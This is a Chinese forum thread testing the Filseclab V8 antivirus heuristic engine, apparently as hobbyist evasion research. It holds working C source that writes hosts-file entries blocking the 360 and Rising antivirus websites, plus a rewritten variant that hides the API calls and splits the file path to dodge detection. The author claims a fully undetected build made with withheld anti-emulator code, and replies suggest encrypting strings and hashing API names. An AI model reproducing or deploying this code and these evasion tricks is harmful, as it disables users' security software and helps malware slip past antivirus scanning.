小探费尔启发扫描

MagicFuzzX

费尔新出的V8扫描器引入了虚拟机启发，这也是费尔V8的特色之一，今天我们就来简单的测试下费尔的虚拟机启发。
先来一段简单的代码，费尔能启发到威胁

1. VOID ModifyHosts()
   
2. {
   
3.         CHAR szHostsPath[MAX_PATH] = {0};
   
4.         GetSystemDirectory(szHostsPath,MAX_PATH);
   
5.         lstrcat(szHostsPath,"\\drivers\\etc\\hosts");
   
6.         CleanMyAttributes(szHostsPath);
   
7.         HANDLE hFile;
   
8.         hFile = CreateFile(szHostsPath,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
   
9.         if (hFile != INVALID_HANDLE_VALUE)
   
10.         {
    
11.                 SetFilePointer(hFile,0,0,FILE_END);
    
12.                 LPSTR lpData = "127.0.0.1 www.360.cn\r\n127.0.0.1 www.rising.com.cn\r\n";
    
13.                 DWORD dwDataSize = lstrlen(lpData);
    
14.                 WriteFile(hFile,lpData,dwDataSize,&dwDataSize,NULL);
    
15.         }
    
16.         SetMyAttributes(szHostsPath);
    
17.         CloseHandle(hFile);
    
18. }

复制代码

这段代码很简单，就是修改下hosts文件，当然了这段代码也是有一定的威胁的，所以费尔报为Heur.NewTreat.a是正确的。

如果我们注释掉//WriteFile(hFile,lpData,dwDataSize,&dwDataSize,NULL);这句，再编译，费尔就没有报毒了，注释掉这句我们的程序就不会向hosts文件写入信息了，所以这里不报也是正确的。

如果我们将lstrcat(szHostsPath,"\\drivers\\etc\\hosts");修改为lstrcat(szHostsPath,"\\drivers\\etc\\hoasts");改变下字符串，再编译，费尔也没有报毒，改掉这句的话我们写入的将不是hosts文件，所以也没有威胁，费尔没报也是正确的。

根据上面的测试我们可以推测费尔的启发是根据字符串和API函数CreateFile,WriteFile组合来启发的。
我们将CreateFile,WriteFile调动方式改为动态的,然后再将字符串截断，修改后的代码如下：

1. typedef BOOL (WINAPI *PWRITEFILE)(HANDLE,LPCVOID,DWORD,LPDWORD,LPOVERLAPPED);
   
2. typedef HANDLE (WINAPI *PCreateFile)(LPCTSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE);
   
3. 
   
4. VOID ModifyHosts()
   
5. {
   
6.         HINSTANCE hLibrary = LoadLibrary("Kernel32.dll");
   
7.         PWRITEFILE  PFuncWriteFile;
   
8.         PFuncWriteFile = (PWRITEFILE)GetProcAddress(hLibrary,"WriteFile");
   
9. 
   
10.         PCreateFile pFuncCreateFile;
    
11.         pFuncCreateFile = (PCreateFile)GetProcAddress(hLibrary,"CreateFileA");
    
12. 
    
13.         CHAR szHostsPath[MAX_PATH] = {0};
    
14.         GetSystemDirectory(szHostsPath,MAX_PATH);
    
15.         lstrcat(szHostsPath,"\\drivers\\etc\\ho");
    
16.         lstrcat(szHostsPath,"sts");
    
17.         CleanMyAttributes(szHostsPath);
    
18.         HANDLE hFile;
    
19.         hFile = pFuncCreateFile(szHostsPath,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    
20.         if (hFile != INVALID_HANDLE_VALUE)
    
21.         {
    
22.                 SetFilePointer(hFile,0,0,FILE_END);
    
23.                 LPSTR lpData = "127.0.0.1 www.360.cn\r\n127.0.0.1 www.rising.com.cn\r\n";
    
24.                 DWORD dwDataSize = lstrlen(lpData);
    
25.                 PFuncWriteFile(hFile,lpData,dwDataSize,&dwDataSize,NULL);
    
26.         }
    
27.         SetMyAttributes(szHostsPath);
    
28.         CloseHandle(hFile);
    
29.         FreeLibrary(hLibrary);
    
30. }

复制代码

居然依旧提示病毒，这个确实超乎我的意料了-_-，看样子不是静态启发了，膜拜下~~
OK，我们加上一段对抗Emulator代码，成功免杀，为了世界的河蟹，不透露了


综上所述，费尔的启发应该是有虚拟机的，膜拜mvm.dll，当然所加的壳更是要膜拜的-_-
附件中的，两个exe，一个免杀费尔虚拟机的，一个没有免杀
测试环境如下：

知微

这个围观，不懂程序

蓝乐

纯膜拜了~~

xiayang1221

回复 1楼 smilediy 的帖子

楼主把动态函数的字符串以及HOSTS路径的字符串都加密一下，我就不试了~这个启发引擎还有很多路要走，动态启发很好anti

MagicFuzzX

回复 4楼 xiayang1221 的帖子

有空做个hash

士兵许三多

都是强人，我是来围观的。

zjkzjy

技术贴，只围观

winxp0286

诺顿,没有反应!!!SONAR II 无反应!!!双击,无效.杯具!!!

zjkzjy

欢迎常来指点,费尔的进步需要你们这些技术淫才。

hds_ss

只能学习了